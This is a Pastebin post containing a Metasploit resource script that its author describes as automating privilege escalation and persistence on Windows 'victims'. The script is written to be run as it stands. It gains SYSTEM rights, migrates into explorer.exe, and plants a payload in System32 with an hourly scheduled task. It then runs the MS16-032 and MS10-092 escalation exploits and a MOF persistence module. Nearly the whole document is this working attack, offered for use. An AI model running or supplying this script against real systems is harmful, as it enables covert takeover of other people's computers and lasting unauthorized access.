indi_g34r

get_priv_per.rc

Jul 28th, 2016
162
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.16 KB | None | 0 0
  1. #
  2. # get_priv_per Script Coded By !NDi G3@r
  3. # This RC Script will automate the process of privilege escalation and persistence in WINDOWS victims
  4. #
  5. #
  6. #
  7. # Kindly Change Settings According To Your Post Exploitation Vector
  8. # Change payload.exe to any respective name u gave to your payload
  9. # Install MOF_PS_PERSIST from the link given below
  10. # raw. githubusercontent .com/khr0x40sh/metasploit-modules/master/persistence/mof_ps_persist.rb
  11. # Set your options with global variable (setg)
  12. # SSA- Suspicious Shell Activity
  13. # usage:
  14. # Meterpreter > resource /../path/get_priv_per.rc
  15.  
  16. sysinfo
  17. getprivs
  18. getsystem
  19. getuid
  20. run migrate -n explorer.exe
  21. upload payload.exe C:\\Windows\\System32
  22. run scheduleme -hr 1 -c "C:\\Windows\\System32\\payload.exe"
  23. background
  24.  
  25. # MS16-032 Privilege Escalation Exploit (make sure victim box is installed with powrshell)
  26. use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
  27. setg SESSION [session_id]
  28. show options
  29. exploit
  30.  
  31. # Windows Escalate Task Scheduler XML Privilege Escalation
  32. use windows/local/ms10_092_schelevator
  33. show options
  34. exploit
  35.  
  36. #MOF_PS_PERSIST
  37. use post/windows/mof_ps_persist
  38. show options
  39. exploit
Add Comment
Please, Sign In to add comment